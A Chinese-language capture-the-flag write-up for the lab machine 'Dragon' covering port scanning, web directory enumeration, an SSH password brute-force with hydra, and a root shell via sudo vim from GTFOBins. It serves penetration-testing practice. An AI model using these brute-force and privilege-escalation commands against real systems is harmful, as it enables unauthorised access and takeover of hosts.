Dragon

image

信息搜集

192.168.100.17

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# rustscan -a 192.168.100.17
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Scanning ports: The virtual equivalent of knocking on doors.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'.
Open 192.168.100.17:22
Open 192.168.100.17:80
[~] Starting Script(s)
[~] Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-26 14:10 +0800
Initiating ARP Ping Scan at 14:10
Scanning 192.168.100.17 [1 port]
Completed ARP Ping Scan at 14:10, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 14:10
Completed Parallel DNS resolution of 1 host. at 14:10, 2.50s elapsed
DNS resolution of 1 IPs took 2.50s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating SYN Stealth Scan at 14:10
Scanning 192.168.100.17 [2 ports]
Discovered open port 22/tcp on 192.168.100.17
Discovered open port 80/tcp on 192.168.100.17
Completed SYN Stealth Scan at 14:10, 0.02s elapsed (2 total ports)
Nmap scan report for 192.168.100.17
Host is up, received arp-response (0.0014s latency).
Scanned at 2026-03-26 14:10:50 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:3A:CE:55 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.67 seconds
           Raw packets sent: 3 (116B) | Rcvd: 14 (2.588KB)

枚举 80/tcp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(root㉿LAPTOP-O235O5EH)-[~]
└─# gobuster dir -u http://192.168.100.17 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.8.2
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.100.17
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8.2
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
secret               (Status: 301) [Size: 317] [--> http://192.168.100.17/secret/]
server-status        (Status: 403) [Size: 279]
Progress: 220558 / 220558 (100.00%)
===============================================================
Finished
===============================================================

image

可以看到一个和靶机名相关的名字,猜测是用户名

dragon

1
hydra -l dragon -P /usr/share/wordlists/rockyou.txt ssh://192.168.100.17

image

提权

dragon -> root

1
2
3
4
5
6
7
dragon@TheHackersLabs-Dragon:~$ sudo -l
Matching Defaults entries for dragon on TheHackersLabs-Dragon:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User dragon may run the following commands on TheHackersLabs-Dragon:
    (ALL) NOPASSWD: /usr/bin/vim

vim 具有sudo权限

gtfobins有方案

https://gtfobins.org/gtfobins/vim/

1
sudo vim -c ':!/bin/sh'

image